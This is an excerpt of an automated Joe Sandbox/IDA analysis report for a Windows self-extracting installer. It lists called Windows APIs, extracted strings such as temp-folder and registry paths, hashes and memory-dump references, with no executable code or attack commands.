                              • API String ID: 3192549508-0
                              • Opcode ID: 31ba59d9759834a282d63e6df2edccb489d5ae17e54cd4dbc75f9f5da0e92170
                              • Instruction ID: a76db949a9941d3cf9fee11aa5ea01341f91a68b5aeab352021b66a3a3d23df3
                              • Opcode Fuzzy Hash: 31ba59d9759834a282d63e6df2edccb489d5ae17e54cd4dbc75f9f5da0e92170
                              • Instruction Fuzzy Hash: BDB09B4763758241D90567B54D4904516411B4A5347C91974862885954D55C91594614

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                              • API String ID: 3049360512-2700888539
                              • Opcode ID: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                              • Instruction ID: 6b2a9ae8cd8aef67c97dff84708e0ff067edfd2a7d4de253115cfc6de1e1a0c8
                              • Opcode Fuzzy Hash: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                              • Instruction Fuzzy Hash: 7F514FA2A3C68286FF18AB70EC1437AF7A1FB45741FC64531D54D06299DFACD444C720

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWait
                              • String ID:
                              • API String ID: 976364251-3916222277
                              • Opcode ID: 16e7ca118e12b91407658261034ebca13a8d1872c09417475df138d405b27805
                              • Instruction ID: 1e8c1ef2777099a748419274ce9e52034216a15c6e8b093d5ddcfdcdd957a202
                              • Opcode Fuzzy Hash: 16e7ca118e12b91407658261034ebca13a8d1872c09417475df138d405b27805
                              • Instruction Fuzzy Hash: 12517EB393C64186FF68AB30E86437AF7A1EB88755F824534E58D46698DFBCD4488B10

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: File$Directory$AttributesCreateDeleteNameRemoveTemp
                              • String ID: IXP$IXP%03d.TMP
                              • API String ID: 4001122843-3932986939
                              • Opcode ID: 1494c94e7564b1c50e09bb3893207fb05a2ef390ee72dbbb783d5dfbcc99321d
                              • Instruction ID: 6a19cdf78c7c2e560d084aef4733b92a64472b1cd109365f2d2771f747061c49
                              • Opcode Fuzzy Hash: 1494c94e7564b1c50e09bb3893207fb05a2ef390ee72dbbb783d5dfbcc99321d
                              • Instruction Fuzzy Hash: 943195B273C68186EE18AB61AC502BAB692FB89B80FC68531DD4D47799CF7CD805C610

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15220
                                • Part of subcall function 00007FF776D151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15231
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15257
                                • Part of subcall function 00007FF776D151F8: LoadResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15268
                                • Part of subcall function 00007FF776D151F8: LockResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15277
                                • Part of subcall function 00007FF776D151F8: memcpy_s.MSVCRT ref: 00007FF776D15296
                                • Part of subcall function 00007FF776D151F8: FreeResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D152A5
                              • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF776D1324B), ref: 00007FF776D162B9
                              • LocalFree.KERNEL32 ref: 00007FF776D16332
                                • Part of subcall function 00007FF776D17958: GetLastError.KERNEL32 ref: 00007FF776D1795C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$FindFreeLocal$AllocErrorLastLoadLockSizeofmemcpy_s
                              • String ID: $<None>$UPROMPT
                              • API String ID: 2171764859-2569542085
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CreateFile$lstrcmp
                              • String ID: *MEMCAB
                              • API String ID: 1301100335-3211172518
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: FileTime$AttributesDateItemLocalText
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 851750970-4151094324
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: AllocLocal
                              • String ID: TMP4351$.TMP
                              • API String ID: 3494564517-2619824408
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager
                              • API String ID: 3677997916-3057196482
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              APIs
                                • Part of subcall function 00007FF776D18BF4: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF776D18C24
                                • Part of subcall function 00007FF776D18BF4: GetCurrentProcessId.KERNEL32 ref: 00007FF776D18C32
                                • Part of subcall function 00007FF776D18BF4: GetCurrentThreadId.KERNEL32 ref: 00007FF776D18C3E
                                • Part of subcall function 00007FF776D18BF4: GetTickCount.KERNEL32 ref: 00007FF776D18C4A
                                • Part of subcall function 00007FF776D18BF4: GetTickCount.KERNEL32 ref: 00007FF776D18C5A
                                • Part of subcall function 00007FF776D18BF4: QueryPerformanceCounter.KERNEL32 ref: 00007FF776D18C75
                              • GetStartupInfoW.KERNEL32 ref: 00007FF776D18495
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CountCurrentTickTime$CounterFileInfoPerformanceProcessQueryStartupSystemThread
                              • String ID:
                              • API String ID: 1911256751-0
                              APIs
                                • Part of subcall function 00007FF776D13C80: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF776D13B49), ref: 00007FF776D13CA4
                                • Part of subcall function 00007FF776D13C80: PeekMessageA.USER32 ref: 00007FF776D13CC9
                                • Part of subcall function 00007FF776D13C80: PeekMessageA.USER32 ref: 00007FF776D13D0D
                              • WriteFile.KERNELBASE ref: 00007FF776D15924
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                              • String ID:
                              • API String ID: 1084409-0
                              APIs
                              • GetFileAttributesA.KERNELBASE ref: 00007FF776D153C5
                              • SetFileAttributesA.KERNEL32 ref: 00007FF776D1544A
                                • Part of subcall function 00007FF776D17D28: FindResourceA.KERNEL32(?,?,?,?,00000000,00007FF776D16D5E), ref: 00007FF776D17D52
                                • Part of subcall function 00007FF776D17D28: LoadResource.KERNEL32(?,?,?,?,00000000,00007FF776D16D5E), ref: 00007FF776D17D69
                                • Part of subcall function 00007FF776D17D28: DialogBoxIndirectParamA.USER32 ref: 00007FF776D17D9F
                                • Part of subcall function 00007FF776D17D28: FreeResource.KERNEL32(?,?,?,?,00000000,00007FF776D16D5E), ref: 00007FF776D17DB1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                              • String ID:
                              • API String ID: 2018477427-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: _cexitexit
                              • String ID:
                              • API String ID: 521370574-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CharPrev
                              • String ID:
                              • API String ID: 122130370-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID:
                              • API String ID: 2962429428-0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                              • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$vclib
                              • API String ID: 3530494346-4181130428
                              APIs
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15220
                                • Part of subcall function 00007FF776D151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15231
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15257
                                • Part of subcall function 00007FF776D151F8: LoadResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15268
                                • Part of subcall function 00007FF776D151F8: LockResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15277
                                • Part of subcall function 00007FF776D151F8: memcpy_s.MSVCRT ref: 00007FF776D15296
                                • Part of subcall function 00007FF776D151F8: FreeResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D152A5
                              • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D13432), ref: 00007FF776D15FB0
                              • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D13432), ref: 00007FF776D15FC1
                              • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D13432), ref: 00007FF776D15FD0
                              • GetDlgItem.USER32 ref: 00007FF776D15FFD
                              • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF776D13432), ref: 00007FF776D1600E
                              • GetDlgItem.USER32 ref: 00007FF776D16026
                              • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF776D13432), ref: 00007FF776D1603A
                              • FreeResource.KERNEL32 ref: 00007FF776D16151
                              • SendMessageA.USER32 ref: 00007FF776D161B3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                              • String ID: CABINET
                              • API String ID: 1305606123-1940454314
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                              • String ID:
                              • API String ID: 2168512254-0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                              • String ID: SeShutdownPrivilege
                              • API String ID: 2829607268-3733053543
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 4104442557-0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Message$BeepVersion
                              • String ID: vclib
                              • API String ID: 2519184315-3480049729
                              • Opcode ID: 65565c2cae3d15c284d40b135d24e5845c1464aff533b678858a98e3463f2ac9
                              • Instruction ID: 22071a0e47d7fbf033087a90af5b12e0878fe0909302f85570d12819031ed18b
                              • Opcode Fuzzy Hash: 65565c2cae3d15c284d40b135d24e5845c1464aff533b678858a98e3463f2ac9
                              • Instruction Fuzzy Hash: FD91B2E3A3C24286FF68AB35DC4467BA660BB04350F930935DA5D83298DEFDE9418720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                              • String ID: "$:$RegServer$\
                              • API String ID: 1203814774-3501211309
                              • Opcode ID: 4699c8f118470d67e499e418bb890767bac054a97211b70f17215beccea90d48
                              • Instruction ID: 284aace64f18b8d9dc4758ad4e7210a84e09f409a88b8dafed71a178c64d252f
                              • Opcode Fuzzy Hash: 4699c8f118470d67e499e418bb890767bac054a97211b70f17215beccea90d48
                              • Instruction Fuzzy Hash: 1A02A0E3E3C68245FE296B349C1027BEB91AF45750FDA0D31C95E066ADCEBCAC05C660
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                              • String ID: $vclib
                              • API String ID: 2654313074-3349352094
                              • Opcode ID: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
                              • Instruction ID: b8de05c8e8b47cc50e74309d73b00dfe1ee804338a1b650e01b8e0161dfa2746
                              • Opcode Fuzzy Hash: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
                              • Instruction Fuzzy Hash: 905196B3A3C64286FF186B31ED4427AEA62FB89B51F868931C91D0679CCFBCD4458710
                              APIs
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14B9A
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14BBE
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14BDE
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14C05
                              • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14C36
                              • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14C54
                              • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14C6E
                              • FreeLibrary.KERNEL32 ref: 00007FF776D14D50
                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14D6C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
